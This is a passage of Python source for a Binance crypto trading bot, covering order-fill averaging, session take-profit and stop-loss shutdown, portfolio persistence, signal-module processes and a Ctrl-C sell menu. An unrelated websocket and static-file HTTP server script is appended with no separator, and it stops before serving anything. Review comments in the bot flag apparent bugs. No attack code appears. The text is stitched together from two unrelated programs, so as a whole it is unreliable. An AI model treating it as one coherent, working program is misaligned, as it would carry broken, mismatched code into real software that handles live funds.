                my_table.add_row([f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coin}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['volume']:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{BuyPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{LastPrice:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['take_profit']:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{coins_bought[coin]['stop_loss']:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{PriceChangeIncFees_Perc:.4f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{((float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at']))*PriceChangeIncFees_Perc)/100:.6f}{txcolors.DEFAULT}", f"{txcolors.SELL_PROFIT if ProfitAfterFees >= 0. else txcolors.SELL_LOSS}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])
                my_table.sortby = 'Change %'
                #my_table.reversesort = True
    if len(coins_bought) == 0:
        if hsp_head == 1:
            print(f"No trade slots are currently in use")
    else:
        if len(my_table._rows) > 0: print_table(my_table)
    # if tpsl_override: is_bot_running = False
    return coins_sold
def extract_order_data(order_details):
    """Aggregate the fill list of a Binance market order into one record.

    Market orders may be filled in several parts at different prices; this
    computes the volume-weighted average price, total volume (truncated to
    the symbol's lot-size precision) and the approximate per-unit fee.

    Args:
        order_details: Binance order response with 'fills', 'symbol',
            'orderId' and 'transactTime'.

    Returns:
        dict: symbol, orderId, timestamp, avgPrice, volume, tradeFeeBNB,
        tradeFeeUnit.
    """
    global TRADING_FEE, STOP_LOSS, TAKE_PROFIT
    transactionInfo = {}
    # This code is from GoranJovic - thank you!
    #
    # adding order fill extractions here
    #
    # just to explain what I am doing here:
    # Market orders are not always filled at one price, we need to find the averages of all 'parts' (fills) of this order.
    #
    # reset other variables to 0 before use
    FILLS_TOTAL = 0
    FILLS_QTY = 0
    FILLS_FEE = 0
    BNB_WARNING = 0
    # loop through each 'fill':
    for fills in order_details['fills']:
        FILL_PRICE = float(fills['price'])
        FILL_QTY = float(fills['qty'])
        FILLS_FEE += float(fills['commission'])
        # check if the fee was in BNB. If not, log a nice warning:
        if (fills['commissionAsset'] != 'BNB') and (TRADING_FEE == 0.075) and (BNB_WARNING == 0):
            print(f"WARNING: BNB not used for trading fee, please enable it in Binance!")
            BNB_WARNING += 1
        # quantity of fills * price
        FILLS_TOTAL += (FILL_PRICE * FILL_QTY)
        # add to running total of fills quantity
        FILLS_QTY += FILL_QTY
        # increase fills array index by 1
    # calculate average fill price:
    FILL_AVG = (FILLS_TOTAL / FILLS_QTY)
    #tradeFeeApprox = (float(FILLS_QTY) * float(FILL_AVG)) * (TRADING_FEE/100)
    # Olorin Sledge: I only want fee at the unit level, not the total level
    tradeFeeApprox = float(FILL_AVG) * (TRADING_FEE/100)
    # the volume size is sometimes outside of precision, correct it
    try:
        info = client.get_symbol_info(order_details['symbol'])
        step_size = info['filters'][2]['stepSize']
        # decimals implied by the step-size string, e.g. '0.00100000' -> 3
        lot_size = step_size.index('1') - 1
        if lot_size <= 0:
            FILLS_QTY = int(FILLS_QTY)
        else:
            FILLS_QTY = truncate(FILLS_QTY, lot_size)
    except Exception as e:
        print(f"extract_order_data(): Exception getting coin {order_details['symbol']} step size! Exception: {e}")
    # create object with received data from Binance
    transactionInfo = {
        'symbol': order_details['symbol'],
        'orderId': order_details['orderId'],
        'timestamp': order_details['transactTime'],
        'avgPrice': float(FILL_AVG),
        'volume': float(FILLS_QTY),
        'tradeFeeBNB': float(FILLS_FEE),
        'tradeFeeUnit': tradeFeeApprox,
    }
    return transactionInfo
def check_total_session_profit(coins_bought, last_price):
    """Stop the bot when total session profit crosses the session TP or SL.

    Computes realised plus unrealised profit (including fees) as a percent
    of the full budget; on breach it sets is_bot_running = False and stores
    the reason in session_tpsl_override_msg for the caller to act on.

    Args:
        coins_bought: held-coin dict (parameter shadows the module global).
        last_price: dict keyed by symbol; only ['price'] is read.
    """
    global is_bot_running, session_tpsl_override_msg
    unrealised_session_profit_incfees_total = 0
    BUDGET = TRADE_SLOTS * TRADE_TOTAL
    for coin in list(coins_bought):
        LastPrice = float(last_price[coin]['price'])
        sellFee = (LastPrice * (TRADING_FEE/100))
        BuyPrice = float(coins_bought[coin]['bought_at'])
        buyFee = (BuyPrice * (TRADING_FEE/100))
        #PriceChangeIncFees_Total = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
        # proceeds net of sell fee minus cost including buy fee
        PriceChangeIncFees_Total = float(((LastPrice-sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
        unrealised_session_profit_incfees_total = float(unrealised_session_profit_incfees_total + PriceChangeIncFees_Total)
    # realised session % plus unrealised % relative to total budget
    allsession_profits_perc = session_profit_incfees_perc + ((unrealised_session_profit_incfees_total / BUDGET) * 100)
    if DEBUG: print(f'Session Override SL Feature: ASPP={allsession_profits_perc} STP {SESSION_TAKE_PROFIT} SSL {SESSION_STOP_LOSS}')
    if allsession_profits_perc >= float(SESSION_TAKE_PROFIT):
        session_tpsl_override_msg = "Session TP Override target of " + str(SESSION_TAKE_PROFIT) + f"% met. Sell all coins now! Session profit is {allsession_profits_perc}%"
        is_bot_running = False
    if allsession_profits_perc <= float(SESSION_STOP_LOSS):
        session_tpsl_override_msg = "Session SL Override target of " + str(SESSION_STOP_LOSS) + f"% met. Sell all coins now! Session loss is {allsession_profits_perc}%"
        is_bot_running = False
def update_portfolio(orders, last_price, volume):
    '''add every coin bought to our portfolio for tracking/selling later.

    In live mode the entry is built from the aggregated Binance order data;
    in TEST_MODE it is built from the fabricated order list plus the local
    price/volume estimates. The portfolio is then persisted to JSON.
    '''
    # print(orders)
    for coin in orders:
        try:
            # LOT_SIZE filter gives the volume step the exchange will accept
            # NOTE(review): orders[coin][0] matches the TEST_MODE list shape;
            # live-mode orders are dicts (extract_order_data), so this lookup
            # presumably falls into the except below — confirm intended
            coin_step_size = float(next(
                filter(lambda f: f['filterType'] == 'LOT_SIZE', client.get_symbol_info(orders[coin][0]['symbol'])['filters'])
            )['stepSize'])
        except Exception as ExStepSize:
            # fall back to a coarse default when the filter lookup fails
            coin_step_size = .1
        if not TEST_MODE:
            coins_bought[coin] = {
                'symbol': orders[coin]['symbol'],
                'orderid': orders[coin]['orderId'],
                'timestamp': orders[coin]['timestamp'],
                'bought_at': orders[coin]['avgPrice'],
                'volume': orders[coin]['volume'],
                'volume_debug': volume[coin],
                'buyFeeBNB': orders[coin]['tradeFeeBNB'],
                'buyFee': orders[coin]['tradeFeeUnit'] * orders[coin]['volume'],
                'stop_loss': -STOP_LOSS,
                'take_profit': TAKE_PROFIT,
                'step_size': float(coin_step_size),
            }
            print(f'Order for {orders[coin]["symbol"]} with ID {orders[coin]["orderId"]} placed and saved to file.')
        else:
            coins_bought[coin] = {
                'symbol': orders[coin][0]['symbol'],
                'orderid': orders[coin][0]['orderId'],
                'timestamp': orders[coin][0]['time'],
                'bought_at': last_price[coin]['price'],
                'volume': volume[coin],
                'stop_loss': -STOP_LOSS,
                'take_profit': TAKE_PROFIT,
                'step_size': float(coin_step_size),
            }
            print(f'Order for {orders[coin][0]["symbol"]} with ID {orders[coin][0]["orderId"]} placed and saved to file.')
    # save the coins in a json file in the same directory
    with open(coins_bought_file_path, 'w') as file:
        json.dump(coins_bought, file, indent=4)
def update_bot_stats():
    """Persist the bot's all-time statistics to disk so they survive restarts."""
    global trade_wins, trade_losses, historic_profit_incfees_perc, historic_profit_incfees_total
    # key order is kept stable so the JSON file layout does not churn
    stats_snapshot = {
        'total_capital' : TRADE_SLOTS * TRADE_TOTAL,
        'botstart_datetime' : str(bot_started_datetime),
        'historicProfitIncFees_Percent': historic_profit_incfees_perc,
        'historicProfitIncFees_Total': historic_profit_incfees_total,
        'tradeWins': trade_wins,
        'tradeLosses': trade_losses,
        'market_startprice': market_startprice
    }
    # written as JSON so the next session can pick up where this one left off
    with open(bot_stats_file_path, 'w') as stats_file:
        json.dump(stats_snapshot, stats_file, indent=4)
def remove_from_portfolio(coins_sold):
    '''Remove coins sold due to SL or TP from portfolio.

    Persists the pruned portfolio to JSON and rebuilds the signal-sell
    ticker file from the coins still held.
    '''
    for coin in coins_sold:
        # code below created by getsec <3
        coins_bought.pop(coin)
    with open(coins_bought_file_path, 'w') as file:
        json.dump(coins_bought, file, indent=4)
    # rebuild the signal-sell ticker file from scratch
    if os.path.exists('signalsell_tickers.txt'):
        os.remove('signalsell_tickers.txt')
    for coin in coins_bought:
        #write_signallsell(coin.removesuffix(PAIR_WITH))
        write_signallsell(rchop(coin, PAIR_WITH))
def write_log(logline):
    """Append one timestamped, tab-separated trade entry to LOG_FILE.

    A TSV header row is written first when the file does not exist yet.
    """
    stamp = datetime.now().strftime("%y-%m-%d %H:%M:%S")
    needs_header = not os.path.exists(LOG_FILE)
    # single open handles both the header (first use) and the entry itself
    with open(LOG_FILE,'a+') as log_file:
        if needs_header:
            log_file.write('Datetime\tType\tCoin\tVolume\tBuy Price\tCurrency\tSell Price\tProfit $\tProfit %\tSell Reason\n')
        log_file.write(stamp + ' ' + logline + '\n')
def write_signallsell(symbol):
    """Append *symbol* to the signal-sell ticker file, one ticker per line."""
    with open('signalsell_tickers.txt','a+') as ticker_file:
        ticker_file.write(f'{symbol}\n')
def remove_external_signals(fileext):
    """Delete every pending external signal file with the given extension.

    Args:
        fileext (str): signal file extension without the dot, e.g. 'buy'.
    """
    for filename in glob.glob(f'signals/*.{fileext}'):
        try:
            os.remove(filename)
        except OSError:
            # narrowed from a bare except: only file-system errors are
            # expected, and KeyboardInterrupt/SystemExit must propagate
            if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file (unknown){txcolors.DEFAULT}')
def sell_all(msgreason, session_tspl_ovr = False):
    """Liquidate every held coin immediately and report the final balance.

    Args:
        msgreason: human-readable reason included in the Discord message.
        session_tspl_ovr: forwarded to sell_coins() as its tpsl_override flag.
    """
    global sell_all_coins
    msg_discord(f'{str(datetime.now())} | SELL ALL COINS: {msgreason}')
    # halt external signal modules first so nothing can buy/sell/pause mid-liquidation
    stop_signal_threads()
    # sell all coins NOW!
    sell_all_coins = True
    sold = sell_coins(session_tspl_ovr)
    remove_from_portfolio(sold)
    # fetch fresh prices and push a closing balance report to Discord
    #last_price = get_price()
    prices_now = wrap_get_price()
    msg_discord(balance_report(prices_now))
    sell_all_coins = False
def sell_a_specific_coin(coin):
    """Immediately sell one held coin, identified by its symbol."""
    global sell_specific_coin
    msg_discord(f'{str(datetime.now())} | SELL SPECIFIC COIN: {coin}')
    # flag sell_coins() into single-coin mode, run it, then clear the flag
    sell_specific_coin = True
    sold = sell_coins(False, coin)
    remove_from_portfolio(sold)
    sell_specific_coin = False
def restart_signal_threads():
    # Restart every running signal process whose name matches a configured
    # module: terminate it, wait briefly, then relaunch it by name.
    # NOTE(review): the sibling functions iterate SIGNALLING_MODULES;
    # EXTSIGNAL_MODULES appears only here — confirm it is actually defined,
    # otherwise the bare except silently turns this function into a no-op.
    try:
        for signalthread in signalthreads:
            if any(signalthread.name in word for word in EXTSIGNAL_MODULES):
                name = signalthread.name
                print(f'Terminating thread {str(name)}')
                signalthread.terminate()
                # brief pause so the process can die before its replacement starts
                time.sleep(2)
                start_signal_thread(name)
    except:
        # best-effort restart: any failure (including an undefined
        # EXTSIGNAL_MODULES/signalthreads) is swallowed
        pass
def stop_signal_threads():
    """Terminate all running external-signal processes (best effort)."""
    try:
        for signalthread in signalthreads:
            print(f'Terminating thread {str(signalthread.name)}')
            signalthread.terminate()
    except Exception as e:
        # narrowed from a bare `except: pass` so Ctrl-C is not swallowed and
        # failures are at least visible
        print(f'stop_signal_threads(): {e}')
def start_signal_threads():
    """Import and launch every configured signalling module in its own process.

    Returns:
        list: handles of the started processes (empty when none configured or
        on failure).
    """
    signal_threads = []
    try:
        # SIGNALLING_MODULES can be None (key present but empty in config.yml).
        # Test for that directly instead of string-matching the TypeError
        # message that `len(None)` used to raise -- that text is not stable
        # across Python versions.
        if SIGNALLING_MODULES:
            for module in SIGNALLING_MODULES:
                # keep the process handle so it can be terminated later
                signal_threads.append(start_signal_thread(module))
        elif SIGNALLING_MODULES is None:
            print(f'No external signal modules running')
        else:
            print(f'No modules to load {SIGNALLING_MODULES}')
    except Exception as e:
        print(f'start_signal_threads(): Loading external signals exception: {e}')
    return signal_threads
def start_signal_thread(module):
    """Import *module* and launch its do_work() entry point in a daemon process.

    Returns the multiprocessing.Process on success, None when import/start fails.
    """
    try:
        print(f'Starting {module}')
        # cache the imported module so it can be restarted by name later
        mymodule[module] = importlib.import_module(module)
        # t = threading.Thread(target=mymodule[module].do_work, args=())
        t = multiprocessing.Process(target=mymodule[module].do_work, args=())
        t.name = module
        t.daemon = True
        t.start()
        # give the module a moment to initialise before starting the next one
        time.sleep(2)
        return t
    except Exception as e:
        if str(e) == "object of type 'NoneType' has no len()":
            print(f'No external signal modules running')
        else:
            print(f'start_signal_thread(): Loading external signals exception: {e}')
def truncate(number, decimals=0):
    """Truncate *number* toward zero at *decimals* decimal places.

    Unlike round(), this never rounds up, which is the safe behaviour when
    sizing exchange orders.
    """
    if not isinstance(decimals, int):
        raise TypeError("decimal places must be an integer.")
    if decimals < 0:
        raise ValueError("decimal places has to be 0 or more.")
    if decimals == 0:
        return math.trunc(number)
    shift = 10.0 ** decimals
    return math.trunc(number * shift) / shift
def wrap_get_price():
    """Refresh the global tickers list (when CUSTOM_LIST autoreload is on) and
    return the latest prices from get_price()."""
    # Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
    global tickers
    if CUSTOM_LIST:
        if CUSTOM_LIST_AUTORELOAD:
            # block until the tickers file reappears if it was deleted/replaced
            while True:
                if not os.path.exists(TICKERS_LIST):
                    print(f"Autoreload tickers cannot find {TICKERS_LIST} file. Will retry in 1 second.")
                    time.sleep(1)
                else:
                    break
            prevcoincount = len(tickers)
            # Reload coins, also adding those coins that we currently hold
            tickers=list(set([line.strip() for line in open(TICKERS_LIST)] + [rchop(coin['symbol'], PAIR_WITH) for coin in coins_bought.values()]))
            if DEBUG:
                print(f"Reloaded tickers from {TICKERS_LIST} file. Prev coin count: {prevcoincount} | New coin count: {len(tickers)}")
    return get_price()
# ---------------------------------------------------------------------------
# Script entry point: parse args/config, authenticate with Binance, restore
# saved portfolio/bot-stats state, start signal modules, then run the main
# buy/sell loop until stopped (Ctrl-C menu) or a session TP/SL override fires.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    #req_version = (3,9)
    #if sys.version_info[:2] < req_version:
    #    print(f'This bot requires Python version 3.9 or higher/newer. You are running version {sys.version_info[:2]} - please upgrade your Python version!!')
    #    sys.exit()

    # Load arguments then parse settings
    args = parse_args()
    mymodule = {}

    # rolling Discord-balance / history-log bookkeeping
    discord_msg_balance_data = ""
    last_msg_discord_balance_date = datetime.now()
    last_history_log_date = datetime.now()

    # set to false at Start
    global bot_paused
    bot_paused = False

    DEFAULT_CONFIG_FILE = 'config.yml'
    DEFAULT_CREDS_FILE = 'creds.yml'

    config_file = args.config if args.config else DEFAULT_CONFIG_FILE
    creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
    parsed_config = load_config(config_file)
    parsed_creds = load_config(creds_file)

    # Default no debugging
    DEBUG = False

    # Load system vars
    TEST_MODE = parsed_config['script_options']['TEST_MODE']
    # LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
    LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
    HISTORY_LOG_FILE = "history.txt"
    DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
    AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')

    # Load trading vars
    PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
    TRADE_TOTAL = parsed_config['trading_options']['TRADE_TOTAL']
    TRADE_SLOTS = parsed_config['trading_options']['TRADE_SLOTS']
    FIATS = parsed_config['trading_options']['FIATS']
    TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
    RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
    CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
    STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
    TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
    #COOLOFF_PERIOD = parsed_config['trading_options']['COOLOFF_PERIOD']
    CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
    CUSTOM_LIST_AUTORELOAD = parsed_config['trading_options']['CUSTOM_LIST_AUTORELOAD']
    TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
    USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
    TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
    TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']

    # Code modified from DJCommie fork
    # Load Session OVERRIDE values - used to STOP the bot when current session meets a certain STP or SSL value
    SESSION_TPSL_OVERRIDE = parsed_config['trading_options']['SESSION_TPSL_OVERRIDE']
    SESSION_TAKE_PROFIT = parsed_config['trading_options']['SESSION_TAKE_PROFIT']
    SESSION_STOP_LOSS = parsed_config['trading_options']['SESSION_STOP_LOSS']

    # Borrowed from DJCommie fork
    # If TRUE, coin will only sell based on an external SELL signal
    SELL_ON_SIGNAL_ONLY = parsed_config['trading_options']['SELL_ON_SIGNAL_ONLY']

    # Discord integration
    # Used to push alerts, messages etc to a discord channel
    MSG_DISCORD = parsed_config['trading_options']['MSG_DISCORD']

    # Whether the bot should reinvest your profits or not.
    REINVEST_PROFITS = parsed_config['trading_options']['REINVEST_PROFITS']

    # Functionality to "reset / restart" external signal modules
    RESTART_EXTSIGNALS = parsed_config['trading_options']['RESTART_EXTSIGNALS']
    EXTSIGNAL_MODULES = parsed_config['trading_options']['EXTSIGNAL_MODULES']

    # Trashcan settings
    #HODLMODE_ENABLED = parsed_config['trading_options']['HODLMODE_ENABLED']
    #HODLMODE_TIME_THRESHOLD = parsed_config['trading_options']['HODLMODE_TIME_THRESHOLD']

    TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
    SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']

    if DEBUG_SETTING or args.debug:
        DEBUG = True

    # Load creds for correct environment
    access_key, secret_key = load_correct_creds(parsed_creds)

    if DEBUG:
        print(f'Loaded config below\n{json.dumps(parsed_config, indent=4)}')
        print(f'Your credentials have been loaded from {creds_file}')

    if MSG_DISCORD:
        DISCORD_WEBHOOK = load_discord_creds(parsed_creds)

    sell_all_coins = False
    sell_specific_coin = False

    # Authenticate with the client, Ensure API key is good before continuing
    if AMERICAN_USER:
        client = Client(access_key, secret_key, tld='us')
    else:
        client = Client(access_key, secret_key)

    # If the users has a bad / incorrect API key.
    # this will stop the script from starting, and display a helpful error.
    api_ready, msg = test_api_key(client, BinanceAPIException)
    if api_ready is not True:
        exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')

    # Use CUSTOM_LIST symbols if CUSTOM_LIST is set to True
    if CUSTOM_LIST: tickers=[line.strip() for line in open(TICKERS_LIST)]

    # try to load all the coins bought by the bot if the file exists and is not empty
    coins_bought = {}

    if TEST_MODE:
        file_prefix = 'test_'
    else:
        file_prefix = 'live_'

    # path to the saved coins_bought file
    coins_bought_file_path = file_prefix + 'coins_bought.json'

    # The below mod was stolen and altered from GoGo's fork, a nice addition for keeping a historical history of profit across multiple bot sessions.
    # path to the saved bot_stats file
    bot_stats_file_path = file_prefix + 'bot_stats.json'

    # use separate files for testing and live trading
    LOG_FILE = file_prefix + LOG_FILE
    HISTORY_LOG_FILE = file_prefix + HISTORY_LOG_FILE

    bot_started_datetime = datetime.now()
    total_capital_config = TRADE_SLOTS * TRADE_TOTAL

    # restore cross-session statistics when a bot_stats file exists
    if os.path.isfile(bot_stats_file_path) and os.stat(bot_stats_file_path).st_size!= 0:
        with open(bot_stats_file_path) as file:
            bot_stats = json.load(file)

        # load bot stats:
        try:
            bot_started_datetime = datetime.strptime(bot_stats['botstart_datetime'], '%Y-%m-%d %H:%M:%S.%f')
        except Exception as e:
            print (f'Exception on reading botstart_datetime from {bot_stats_file_path}. Exception: {e}')
            bot_started_datetime = datetime.now()

        try:
            total_capital = bot_stats['total_capital']
        except Exception as e:
            print (f'Exception on reading total_capital from {bot_stats_file_path}. Exception: {e}')
            total_capital = TRADE_SLOTS * TRADE_TOTAL

        historic_profit_incfees_perc = bot_stats['historicProfitIncFees_Percent']
        historic_profit_incfees_total = bot_stats['historicProfitIncFees_Total']
        trade_wins = bot_stats['tradeWins']
        trade_losses = bot_stats['tradeLosses']
        try:
            market_startprice = bot_stats['market_startprice']
        except:
            pass

        # recompute historic % when the configured capital changed between sessions
        if total_capital != total_capital_config:
            historic_profit_incfees_perc = (historic_profit_incfees_total / total_capital_config) * 100

        if REINVEST_PROFITS:
            TRADE_TOTAL = total_capital / TRADE_SLOTS

    # rolling window of prices; cyclical queue
    historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
    hsp_head = -1

    # prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
    volatility_cooloff = {}

    # if saved coins_bought json file exists and it's not empty then load it
    if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0:
        with open(coins_bought_file_path) as file:
            coins_bought = json.load(file)

    print(f'{txcolors.WARNING}Press Ctrl-C for more options / to stop the bot{txcolors.DEFAULT}')

    if not TEST_MODE:
        if not args.notimeout: # if notimeout skip this (fast for dev tests)
            print('WARNING: Test mode is disabled in the configuration, you are using _LIVE_ funds.')
            print('WARNING: Waiting 10 seconds before live trading as a security measure!')
            time.sleep(10)

    # clear stale external-signal files left over from a previous run
    remove_external_signals('buy')
    remove_external_signals('sell')
    remove_external_signals('pause')

    # load signalling modules
    signalthreads = start_signal_threads()

    # seed initial prices
    wrap_get_price()

    TIMEOUT_COUNT=0
    READ_CONNECTERR_COUNT=0
    BINANCE_API_EXCEPTION=0

    thehour = datetime.now().hour

    while is_bot_running:
        try:
            orders, last_price, volume = buy()
            update_portfolio(orders, last_price, volume)
            if SESSION_TPSL_OVERRIDE:
                check_total_session_profit(coins_bought, last_price)

            coins_sold = sell_coins()
            remove_from_portfolio(coins_sold)
            update_bot_stats()

            # restart external signal modules once per hour when configured
            if RESTART_EXTSIGNALS and thehour != datetime.now().hour :
                restart_signal_threads()
                thehour = datetime.now().hour

        except ReadTimeout as rt:
            TIMEOUT_COUNT += 1
            print(f'We got a timeout error from Binance. Re-loop. Connection Timeouts so far: {TIMEOUT_COUNT}')
        except ConnectionError as ce:
            READ_CONNECTERR_COUNT += 1
            print(f'We got a connection error from Binance. Re-loop. Connection Errors so far: {READ_CONNECTERR_COUNT}')
        except BinanceAPIException as bapie:
            BINANCE_API_EXCEPTION += 1
            print(f'We got an API error from Binance. Re-loop. API Errors so far: {BINANCE_API_EXCEPTION}.\nException:\n{bapie}')
        except KeyboardInterrupt as ki:
            # stop external signal threads
            stop_signal_threads()
            # interactive Ctrl-C menu
            while True:
                #print_notimestamp(f'{txcolors.WARNING}\n--| Binance Bot Menu |--{txcolors.DEFAULT}')
                print_notimestamp(f'\n[1] Exit (default option)')
                print_notimestamp(f'\n[2] Sell All Coins')
                print_notimestamp(f'\n[3] Sell A Specific Coin')
                print_notimestamp(f'\n[4] Resume Bot')
                print_notimestamp(f'\n{txcolors.WARNING}Please choose one of the above menu options ([1]. Exit):{txcolors.DEFAULT}')
                menuoption = input()

                if menuoption == "1" or menuoption == "":
                    print_notimestamp('\n')
                    sys.exit(0)
                elif menuoption == "2":
                    print_notimestamp('\n')
                    sell_all('Sell All Coins menu option chosen!')
                    print_notimestamp('\n')
                elif menuoption == "3":
                    while not menuoption.upper() == "N":
                        # setup table
                        my_table = PrettyTable()
                        my_table.field_names = ["Symbol", "Volume", "Bought At", "Now At", "TP %", "SL %", "Change % (ex fees)", "Profit $", "Time Held"]
                        my_table.align["Symbol"] = "l"
                        my_table.align["Volume"] = "r"
                        my_table.align["Bought At"] = "r"
                        my_table.align["Now At"] = "r"
                        my_table.align["TP %"] = "r"
                        my_table.align["SL %"] = "r"
                        my_table.align["Change % (ex fees)"] = "r"
                        my_table.align["Profit $"] = "r"
                        my_table.align["Time Held"] = "l"

                        # get latest prices
                        last_price = wrap_get_price()

                        # display coins to sell
                        for coin in coins_bought:
                            time_held = timedelta(seconds=datetime.now().timestamp()-int(str(coins_bought[coin]['timestamp'])[:10]))
                            change_perc = (float(last_price[coin]['price']) - float(coins_bought[coin]['bought_at']))/float(coins_bought[coin]['bought_at']) * 100
                            ProfitExFees = float(last_price[coin]['price']) - float(coins_bought[coin]['bought_at'])
                            my_table.add_row([f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{coin}{txcolors.DEFAULT}",
                                              f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(coins_bought[coin]['volume']):.6f}{txcolors.DEFAULT}",
                                              f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(coins_bought[coin]['bought_at']):.6f}{txcolors.DEFAULT}",
                                              f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(last_price[coin]['price']):.6f}{txcolors.DEFAULT}",
                                              f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(coins_bought[coin]['take_profit']):.4f}{txcolors.DEFAULT}",
                                              f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{float(coins_bought[coin]['stop_loss']):.4f}{txcolors.DEFAULT}",
                                              f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{change_perc:.4f}{txcolors.DEFAULT}",
                                              f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{(float(coins_bought[coin]['volume'])*float(coins_bought[coin]['bought_at'])*change_perc)/100:.6f}{txcolors.DEFAULT}",
                                              f"{txcolors.SELL_PROFIT if ProfitExFees >= 0. else txcolors.SELL_LOSS}{str(time_held).split('.')[0]}{txcolors.DEFAULT}"])

                        my_table.sortby = 'Change % (ex fees)'
                        if len(my_table._rows) > 0:
                            print_notimestamp(my_table)
                        else:
                            break

                        # ask for coin to sell
                        print_notimestamp(f'{txcolors.WARNING}\nType in the Symbol you wish to sell, including pair (i.e. BTCUSDT) or type N to return to Menu (N)?{txcolors.DEFAULT}')
                        menuoption = input()
                        if menuoption == "":
                            break
                        # NOTE(review): typing 'N' still calls this once before the
                        # loop condition exits -- confirm intended
                        sell_a_specific_coin(menuoption.upper())
                elif menuoption == "4":
                    print_notimestamp(f'{txcolors.WARNING}\nResuming the bot...\n\n{txcolors.DEFAULT}')
                    # NOTE(review): return value not stored back into
                    # `signalthreads`, so restarted handles are lost -- confirm
                    start_signal_threads()
                    break

        # set False by check_total_session_profit() when the session-level
        # TP/SL override is hit
        if not is_bot_running:
            if SESSION_TPSL_OVERRIDE:
                print(f'')
                print(f'')
                print(f'{txcolors.WARNING}{session_tpsl_override_msg}{txcolors.DEFAULT}')
                sell_all(session_tpsl_override_msg, True)
                sys.exit(0)
            else:
                print(f'')
                print(f'')
                print(f'Bot terminated for some reason.')
from os import chdir
from sys import stdout
from socketserver import ThreadingMixIn
from http.server import SimpleHTTPRequestHandler, HTTPServer
from threading import Thread
from websocket_server_api import WebsocketServer
from socket_server import new_client, message_received
lg = """
_ ____ _ _
(_) / __ \\ | (_)
_ ___ _ __| | | |_ __ | |_ _ __ ___
| |/ _ \\| '__| | | | '_ \\| | | '_ \\ / _ \\
| | (_) | | | |__| | | | | | | | | | __/
| |\\___/|_| \\____/|_| |_|_|_|_| |_|\\___|
_/ |
|__/
By Dan Burrows
"""
def run_socket_server(SOC_HOST, SOC_PORT):
    """Start the websocket server on SOC_HOST:SOC_PORT, wire in the connect /
    message callbacks, and serve until it stops."""
    ws_server = WebsocketServer(SOC_PORT, SOC_HOST)
    ws_server.set_fn_new_client(new_client)
    ws_server.set_fn_message_received(message_received)
    try:
        ws_server.run_forever()
    except AssertionError:
        print("Ignoring Assertion Error")
# ---------------------------------------------------------------------------
# Entry point: start the websocket server on a background thread, then serve
# the static files in ./files over HTTP until Ctrl-C.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    print(lg)
    HOST = '0.0.0.0'
    PORT = 1234
    SOC_PORT = 9001

    stdout.write('- Initializing WebSocket Server Threads...\t')
    wsoc_thread = Thread(target=run_socket_server, args=(HOST, SOC_PORT))
    stdout.write('[DONE]\n')

    # HTTP server that handles each request on its own thread
    class Server_With_Threading(ThreadingMixIn, HTTPServer):
        pass

    # Building server object...
    stdout.write('- Initializing HTTP Server Threads...\t')
    server = Server_With_Threading((HOST, PORT), SimpleHTTPRequestHandler)
    stdout.write('[DONE]\n')

    # Pointing to folder containing index.html...
    stdout.write('- Locking In File System...\t')
    chdir('files')
